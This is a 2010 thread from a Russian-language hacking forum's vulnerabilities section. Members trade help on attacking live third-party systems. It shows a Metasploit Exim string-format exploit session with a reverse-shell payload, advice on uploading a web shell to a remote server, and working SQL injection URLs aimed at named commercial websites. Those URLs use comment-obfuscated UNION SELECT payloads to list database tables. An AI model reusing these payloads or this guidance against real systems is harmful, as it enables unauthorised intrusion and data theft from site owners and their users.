HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15831  
Старый 12.12.2010, 19:26
Darklamar
Guest
Сообщений: n/a
Провел на форуме:
1838

Репутация: 0
По умолчанию

Цитата:
Сообщение от MikePro  
MikePro said:
Подскажите пожалуйста как создать shell и как им пользоватся
Скинул ссылку на один шелл в пм. По теме: тебе необходимо его залить на удаленный сервер, а для этого ищи уязвимости.
 
Ответить с цитированием

  #15832  
Старый 12.12.2010, 21:10
p0deje
Guest
Сообщений: n/a
Провел на форуме:
4212

Репутация: 0
По умолчанию

Столкнулся со следующей проблемой. На сайте крутится Exim 4.69.

Вывод nmap:

25/tcp open smtp Exim smtpd 4.69

Пытаюсь использовать готовый эксплойт в Metsploit - http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_format

Вывод консоли:

msf > use unix/smtp/exim4_string_format

msf exploit(exim4_string_format) > set LHOST xxx

LHOST => xxx

msf exploit(exim4_string_format) > set RHOST yyy

RHOST => yyy

msf exploit(exim4_string_format) > set Payload generic/shell_reverse_tcp

Payload => generic/shell_reverse_tcp

msf exploit(exim4_string_format) > exploit

[-] Handler failed to bind to xxx:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Server: yyy ESMTP Exim 4.69 #1 Sun, 12 Dec 2010 11:00:32 -0600

220-We do not authorize the use of this system to transport unsolicited,

220 and/or bulk e-mail.
[*] EHLO: yyy Hello xxx [xxx]
[*] EHLO: 250-SIZE 52428800
[*] EHLO: 250-PIPELINING
[*] EHLO: 250-AUTH PLAIN LOGIN
[*] EHLO: 250-STARTTLS
[*] EHLO: 250 HELP
[*] Determined our hostname is xxx and IP address is xxx
[*] MAIL: 250 OK
[*] RCPT: 550-xxx (xxx) [xxx] is currently

550-not permitted to relay through this server. Perhaps you have not logged

550-into the pop/imap server in the last 30 minutes or do not have SMTP

550 Authentication turned on in your email client.
[*] DATA: 503-All RCPT commands were rejected with this error:

503-xxx (xxx.com) [xxx] is currently

503-not permitted to relay through this server. Perhaps you have not logged

503-into the pop/imap server in the last 30 minutes or do not have SMTP

503-Authentication turned on in your email client.

503 Valid RCPT command must precede DATA
[*] Constructing initial headers ...
[*] Constructing HeaderX ...
[*] Constructing body ...
[*] Sending 50 megabytes of data...

[-] Exploit exception: Broken pipe
[*] Exploit completed, but no session was created.

Что это за Broken pipe такой? Кто-нибудь вообще пробовал этот сплойт?

На другом сервере выдает:
[*] MAIL: 250 OK
[*] RCPT: 550-"JunkMail rejected - xxx (xxx.com) 550-[xxx]:50524 is in an RBL, see 550 http://www.spamhaus.org/query/bl?ip=xxx"

[-] Exploit exception: end of file reached
[*] Exploit completed, but no session was created.

Тут я тоже ничего не понимю
 
Ответить с цитированием

  #15833  
Старый 12.12.2010, 21:19
Darklamar
Guest
Сообщений: n/a
Провел на форуме:
1838

Репутация: 0
По умолчанию

Может порт 4444 защищен?
 
Ответить с цитированием

  #15834  
Старый 12.12.2010, 21:50
p0deje
Guest
Сообщений: n/a
Провел на форуме:
4212

Репутация: 0
По умолчанию

4444 порт биндится на моей машине и с ним все ок
 
Ответить с цитированием

  #15835  
Старый 12.12.2010, 22:22
Darklamar
Guest
Сообщений: n/a
Провел на форуме:
1838

Репутация: 0
По умолчанию

"Handler failed to bind to xxx:4444" походу не забиндился порт
 
Ответить с цитированием

  #15836  
Старый 13.12.2010, 00:27
fl00der
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131

Репутация: 74
По умолчанию

http://www.alienzero.com/agent/resulttype.asp?probe='

Как ваще это крутить? Нашел по этой уязвимости http://1337db.com/exploits/15056

Подскажите плз.
 
Ответить с цитированием

  #15837  
Старый 13.12.2010, 00:42
DesCent
Guest
Сообщений: n/a
Провел на форуме:
73674

Репутация: 16
По умолчанию

Если верить вики, то Джет - это то же, что и Access, по идее так же должно и крутиться.

Мб стоит попробовать по этой статейке: /showthread.php?p=2193060 ?

З.Ы. Самому интересно.
 
Ответить с цитированием

  #15838  
Старый 13.12.2010, 01:31
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Не выводяться таблицы!

http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,table_name,7,8,9+from+information_schem a.tables+--+
 
Ответить с цитированием

  #15839  
Старый 13.12.2010, 09:53
freezed
Guest
Сообщений: n/a
Провел на форуме:
31258

Репутация: 7
По умолчанию

Цитата:
Сообщение от FlaktW  
FlaktW said:
Не выводяться таблицы!
http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,table_name,7,8,9+from+information_schem a.tables+--+
http://www.copelandfurniture.com/subcategory.php?id=-1+/*!union*/+select+1,2,3,4,5,/*!table_name*/,7,8,9+from+information_schema.tables+limit+0,1+--+
 
Ответить с цитированием

  #15840  
Старый 13.12.2010, 09:56
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от FlaktW  
FlaktW said:
Не выводяться таблицы!
http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,table_name,7,8,9+from+information_schem a.tables+--+
http://www.copelandfurniture.com/subcategory.php?id=-1+/*!UnIoN+SeLeCt*/+1,2,3,4,5,/*!unhex%28hex%28table_name%29%29*/,7,8,9+from+information_schema.tables+--+

часто вижу как ты выкладываешь сюда скули недокрученные, а подумать чуток? вот тебе таблы, без лимита все сразу
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ